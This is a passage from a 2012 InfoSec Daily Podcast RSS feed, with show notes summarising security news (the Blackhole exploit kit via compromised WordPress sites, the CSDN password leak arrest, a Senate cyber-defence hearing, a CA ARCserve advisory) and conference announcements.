<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Clicking this link leads to a series of compromised WordPress sites, which ultimately point users to the Blackhole Exploit kit that targets vulnerabilities cited in</span><a href="http://about-threats.trendmicro.com/vulnerability.aspx?language=us&amp;name=Adobe%20TIFF%20File%20Vulnerability"><span style="font-size:13px;font-family:Verdana;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;"> CVE-2010-0188</span></a><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> and</span><a href="http://about-threats.trendmicro.com/vulnerability.aspx?language=us&amp;name=Microsoft%20Windows%20Help%20Centre%20Malformed%20Escape%20Sequences%20Vulnerability"><span style="font-size:13px;font-family:Verdana;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;"> CVE-2010-1885</span></a><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">. This is detected by Trend Micro as</span><a href="http://about-threats.trendmicro.com/Malware.aspx?language=us&amp;name=JS_BLACOLE.IC"><span style="font-size:13px;font-family:Verdana;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;"> JS_BLACOLE.IC</span></a><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> &nbsp;</span><a href="http://www.china.org.cn/china/2012-03/22/content_24957036.htm"><span style="font-size:13px;font-family:Verdana;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.china.org.cn/china/2012-03/22/content_24957036.htm</span></a></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The man suspected of hacking into China&#39;s largest website for programmers and leaking personal information about more than 6 million users last December has been detained on charges of illegal acquisition of computer data, Beijing News reported yesterday.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The suspect, surnamed Zeng, was nabbed in Wenzhou, east China&#39;s Zhejiang Province, on February 4 after Beijing police opened an investigation into the case on December 22, the paper said.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The leak, considered the biggest in China&#39;s Internet history, occurred on December 21 when personal information of over 6 million users of the China Software Developer Network was exposed on the Internet for free downloading.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Police said the leaked information contained user IDs, passwords and e-mail addresses in clear text. The leak had a rippling effect on other websites, including online shopping, gaming, social networking and even financial service websites.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Police noticed that most of the leaked data dated from July 2009 to July 2010, indicating the CSDN server was hacked before July 2010.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Zeng caught the police&#39;s attention because he claimed in an online post in September 2010 that he had gained command of the CSDN database and wanted to cooperate with the website, it was reported.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">He admitted to hacking into the CSDN server in April 2010 through a system loophole and sneaking into an online recharge platform and a stock brokerage system.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">During the investigation, police also uncovered four other hackers, the paper said.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> &nbsp;</span><a href="http://defense.aol.com/2012/03/21/they-re-here-cyber-experts-warn-senate-that-adversary-is-alread/"><span style="font-size:13px;font-family:Verdana;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://defense.aol.com/2012/03/21/they-re-here-cyber-experts-warn-senate-that-adversary-is-alread/</span></a></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">With attacks on U.S. networks increasing even as both government and industry pour more money into defense, top officials told the U.S. Senate Tuesday that the nation needs a new approach &ndash; one that presumes an eternal state of cyber-war. &quot;I think we&#39;ve got the wrong mental model here,&quot; said James Peery of the Energy Department&#39;s Sandia National Laboratories. &quot;We&#39;ve got to go to a model where we assume our adversary is in our networks, on our machines, and we&#39;ve got to operate anyway, we&#39;ve got to protect the data anyway.&quot;</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;">&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Today&#39;s cyber-defenses are only &quot;buying tactical breathing room&#8230; much like treading water,&quot; agreed the acting director of the Defense Advanced Research Projects Agency, Ken Gabriel. &quot;If you find yourself in the middle of the ocean, treading water is a good thing,&quot; he went on, but it&#39;s not sufficient as a long-term strategy. Today, it&#39;s much cheaper and easier to attack a computer network than it is to defend it, the assembled experts agreed; what&#39;s essential is to change that &quot;cost equation.&quot;</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;">&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">That disturbed Ohio Sen. Rob Portman, the top Republican on the &quot;emerging threats&quot; panel of the Senate Armed Services Committee, which held the hearing. &quot;You believe,&quot; he summed up, &quot;[that] we can do things that make it more costly for them to hack into our systems&#8230; but you didn&#39;t say that we can stop them.&quot;</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;">&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;We are in an environment of measures and countermeasure,&quot; replied Zachary Lemnios, the Pentagon&#39;s chief technology officer and assistant secretary of defense for research and engineering. As in other areas of warfare, &quot;for every concept that&#39;s deployed, a countermeasure is deployed by an adversary.&quot;</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&nbsp;</span><a href="https://support.ca.com/irj/portal/anonymous/phpsupcontent?contentID="><span style="font-size:13px;font-family:Verdana;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">https://support.ca.com/irj/portal/anonymous/phpsupcontent?contentID={983E3A52-8374-410A-82BD-B8788733C70F}</span></a></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CA Technologies has found a nasty flaw in flagship backup software ARCServe.&nbsp; The flaw goes all the way back to version 10 of the product, which has just reached v.16.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CA says the problem &ldquo;can allow a remote attacker to cause a denial of service condition&ldquo; and &ldquo; &hellip; occurs due to insufficient validation of certain network requests. An attacker can potentially use the vulnerability to disable network services.&rdquo;</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Many versions of ARCserve can fix the bug with a patch, but CA&#39;s</span><a href="https://support.ca.com/irj/portal/anonymous/phpsupcontent?contentID=%7B983E3A52-8374-410A-82BD-B8788733C70F%7D"><span style="font-size:13px;font-family:Verdana;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;"> advisory</span></a><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> says the solution for ARCserve Backup for Windows r12.0 is to &ldquo;Update to CA ARCserve Backup for Windows r16 SP1.&rdquo;</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">We&#39;re sure ARCserve users will appreciate the forced upgrade and happily set aside other work to make it happen</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span></p>
]]></content:encoded>
			<wfw:commentRss>http://www.isdpodcast.com/episode-626-mind-the-log-top-7-improvements-xor-bypass-wordpress-blackhole-china-hacking-theyre-already-there-and-ca-ddos/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
			<enclosure url="http://www.isdpodcast.com/podpress_trac/feed/3672/0/infosec-daily-podcast-episode-626.mp3" length="18743675" type="audio/mpeg" />
		<itunes:duration>0:39:00</itunes:duration>
		<itunes:subtitle>InfoSec Daily Podcast Episode 626 for March 22, 2012. Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, and Dr. Bonez.
&#160;
Announcements:
InfoSec Southwest
	When: March 30-April 1
	[...]</itunes:subtitle>
		<itunes:summary>InfoSec Daily Podcast Episode 626 for March 22, 2012. Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, and Dr. Bonez.
&#160;
Announcements:
InfoSec Southwest
	When: March 30-April 1
	Where: Austin, TX
	http://www.Infosecsouthwest.com
&#160;
Outerz0ne 8
When:April 20th-21st
Where:Wellesley Inn, Atlanta GA.
http://www.outerz0ne.org 
&#160;
Linuxfest Northwest 2012
	When: Saturday, April 28th-29th, 2012
	Where: Bellingham Technical College &#8211; Bellingham, WA
	http://www.linuxfestnorthwest.org/
&#160;
AIDE 2012
	When: May 21-25, 2012
	Where: MU Forensic Science Center &#160;- Huntington, West Virginia
	http://www.appyide.org/
&#160;
LayerOne 2012
	When: May 26-27, 2012
	Where: Clarion Hotel &#8211; Anaheim, CA
	http://www.layerone.org
&#160;
Security 504: Hacker Techniques, Exploits &#38; Incident Handling &#8211; Matt Romanek
When: June 20 &#8211; 27, 2012
	Where: Courtyard Seattle Federal Way, WA 
	http://www.sans.org/mentor/details.php?nid=28014
	&#160;
Social Engineering Training
When: July 21-24, 2012
	Where: Black Hat Vegas
When: August 20-24, 2012
	Where: &#160;Bristol, UK
When: &#160;November 12-16, 2012
	Where: &#160;Columbia, MD
http://www.social-engineer.com/social-engineer-training
&#160;
Inside and Out of the Social-Engineer Toolkit (SET)
	When: July 21 &#8211; 22, 2012
	When: July 23 &#8211; 24, 2012
	Where: Black Hat Vegas
	http://blackhat.com/html/bh-us-12/training/courses/bh-us-12-training_social_engineer_toolkit.html
&#160;
DerbyCon 2012 &#8211; The &#8220;Deuce&#8221; Reunion
	When: &#160;September 27-30, 2012
	Where: Louisville, KY
	http://www.derbycon.com
&#160;
Skydogcon
	When: October 26-28
	Where: Hotel Preston in Nashville, TN 
	http://www.skydogcon.com 
&#160;
Thanks to everyone that has purchased products from Amazon through the affiliate program. &#160;If you&#8217;re not familiar with the affiliate program, simply go to http://www.isdpodcast.com and locate the Affiliate Program link on the right hand side.
&#160;
You don't have a sufficient version of Flash Player to display this animation.
&#160;
Stories
Tool: &#160;
http://www.irongeek.com/i.php?page=security/logwatch-script-grep-for-rfis-webscanners-webshell-attacks
&#160;
Source: http://thehackernews.com/2012/03/7-ways-to-improve-your-networks-web.html
Admins looking to improve on their company&#8217;s web security often turn to software solutions to help assess and automate their security tasks. Good web security software can make surfing the web safe and secure by protecting users from potential vulnerabilities in their operating systems or browsers, as well as helping them to avoid policy violations. The top web security software packages can help you to improve your network&#8217;s web security in many ways. Here are seven of the major benefits web security software offers:
&#8230;
Source: &#160;http://blog.damballa.com/?p=1543
Many organizations I speak with have instigated network filtering and security monitoring solutions targeted at identifying malicious binaries traversing their egress points. Something that they&#8217;ve been observing in recent months is the increase of suspicious binaries that are unsupported and non-executable. Ordinarily any intercepted binaries would be farmed off to static anti-virus scanners or tin-wrapped behavioral analysis engines for classification; however a growing volume of these binaries cannot be scanned or executed within virtual environments. What&#8217;s going on?
More often than not, these perimeter network defenses are encountering encoded and obfuscated malicious binaries &#8211; constructed purposefully by an attacker to bypass network threat detection products. These evasions aren&#8217;t anything new, it&#8217;s just that the tools and functionality to encode malicious binaries &#8220;on-the-fly&#8221; have become standard features in a growing number of automated attack delivery tools and DIY botnet construction kits.
The[...]</itunes:summary>
		<itunes:keywords>Podcast</itunes:keywords>
		<itunes:author>Rick Hayes with Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, and Dr. Bonez.</itunes:author>
		<itunes:explicit>no</itunes:explicit>
		<itunes:block>no</itunes:block>
	</item>
		<item>
		<title>Episode 625 &#8211; NASA, 10Mil Attacks Daily, Vupen, MSF MS12-020, and Comodo Consumer Advocacy</title>
		<link>http://www.isdpodcast.com/episode-625-nasa-10mil-attacks-daily-vupen-msf-ms12-020-and-comodo-consumer-advocacy</link>
		<comments>http://www.isdpodcast.com/episode-625-nasa-10mil-attacks-daily-vupen-msf-ms12-020-and-comodo-consumer-advocacy#comments</comments>
		<pubDate>Thu, 22 Mar 2012 00:45:29 +0000</pubDate>
		<dc:creator>rick.hayes</dc:creator>
				<category><![CDATA[Podcast]]></category>

		<guid isPermaLink="false">http://www.isdpodcast.com/?p=3668</guid>
		<description><![CDATA[InfoSec Daily Podcast Episode 625 for March 21, 2012. Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Karthik Rangarajan, and Dr. Bonez. &#160; Announcements: InfoSec Southwest When: March 30-April 1 Where: Austin, TX http://www.Infosecsouthwest.com &#160; Linuxfest Northwest 2012 When: Saturday, April 28th-29th, 2012 Where: Bellingham Technical College &#8211; Bellingham, WA http://www.linuxfestnorthwest.org/ &#160; AIDE 2012 [...]]]></description>
			<content:encoded><![CDATA[<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">InfoSec Daily Podcast Episode 625 for March 21, 2012. </span><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Karthik Rangarajan, and Dr. Bonez.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Announcements:</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">InfoSec Southwest<br class="kix-line-break" /><br />
	</span><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: March 30-April 1<br class="kix-line-break" /><br />
	Where: Austin, TX<br class="kix-line-break" /><br />
	</span><a href="http://www.infosecsouthwest.com/"><span style="font-size:13px;font-family:Verdana;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.Infosecsouthwest.com</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Linuxfest Northwest 2012<br class="kix-line-break" /><br />
	</span><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Saturday, April 28th-29th, 2012<br class="kix-line-break" /><br />
	Where: Bellingham Technical College &#8211; Bellingham, WA<br class="kix-line-break" /><br />
	</span><a href="http://www.linuxfestnorthwest.org/"><span style="font-size:13px;font-family:Verdana;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.linuxfestnorthwest.org/</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">AIDE 2012<br class="kix-line-break" /><br />
	</span><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: May 21-25, 2012<br class="kix-line-break" /><br />
	Where: MU Forensic Science Center &nbsp;- Huntington, West Virginia<br class="kix-line-break" /><br />
	</span><a href="http://www.appyide.org/"><span style="font-size:13px;font-family:Verdana;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.appyide.org/</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">LayerOne 2012<br class="kix-line-break" /><br />
	</span><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: May 26-27, 2012<br class="kix-line-break" /><br />
	Where: Clarion Hotel &#8211; Anaheim, CA<br class="kix-line-break" /><br />
	</span><a href="http://www.layerone.org/"><span style="font-size:13px;font-family:Verdana;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.layerone.org</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Security 504: Hacker Techniques, Exploits &amp; Incident Handling &#8211; Matt Romanek</span></p>
<p><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: June 20 &#8211; 27, 2012<br class="kix-line-break" /><br />
	Where: Courtyard Seattle Federal Way, WA</span><a href="http://www.sans.org/mentor/details.php?nid=28014"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> <br class="kix-line-break" /><br />
	</span><span style="font-size:13px;font-family:Verdana;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.sans.org/mentor/details.php?nid=28014</span></a><br />
	&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Social Engineering Training</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: July 21-24, 2012<br class="kix-line-break" /><br />
	Where: Black Hat Vegas</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: August 20-24, 2012<br class="kix-line-break" /><br />
	Where: &nbsp;Bristol, UK</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;November 12-16, 2012<br class="kix-line-break" /><br />
	Where: &nbsp;Columbia, MD</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><a href="http://www.social-engineer.com/social-engineer-training"><span style="font-size:13px;font-family:Verdana;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.com/social-engineer-training</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Inside and Out of the Social-Engineer Toolkit (SET)<br class="kix-line-break" /><br />
	</span><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: July 21 &#8211; 22, 2012<br class="kix-line-break" /><br />
	When: July 23 &#8211; 24, 2012<br class="kix-line-break" /><br />
	Where: Black Hat Vegas<br class="kix-line-break" /><br />
	</span><a href="http://blackhat.com/html/bh-us-12/training/courses/bh-us-12-training_social_engineer_toolkit.html"><span style="font-size:13px;font-family:Verdana;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://blackhat.com/html/bh-us-12/training/courses/bh-us-12-training_social_engineer_toolkit.html</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">DerbyCon 2012 &#8211; The &ldquo;Deuce&rdquo; Reunion<br class="kix-line-break" /><br />
	</span><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;September 27-30, 2012<br class="kix-line-break" /><br />
	Where: Louisville, KY<br class="kix-line-break" /><br />
	</span><a href="http://www.derbycon.com/"><span style="font-size:13px;font-family:Verdana;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.derbycon.com</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Thanks to everyone that has purchased products from Amazon through the affiliate program. &nbsp;If you&rsquo;re not familiar with the affiliate program, simply go to</span><a href="../"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:13px;font-family:Verdana;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.isdpodcast.com</span></a><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> and locate the Affiliate Program link on the right hand side.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><div class="awshortcode-carrousel align&amp;quot;right&amp;quot;"><object type="application/x-shockwave-flash" data="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" width="600" height="200"><param name="movie" value="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" /><param name="bgcolor" value="#fff" /><param name="quality" value="high" /><param name="allowscriptaccess" value="always" /><param name="wmode" value="transparent" /><p>You don't have a sufficient version of Flash Player to display this animation.</p></object></div></span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;">&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Stories</span></p>
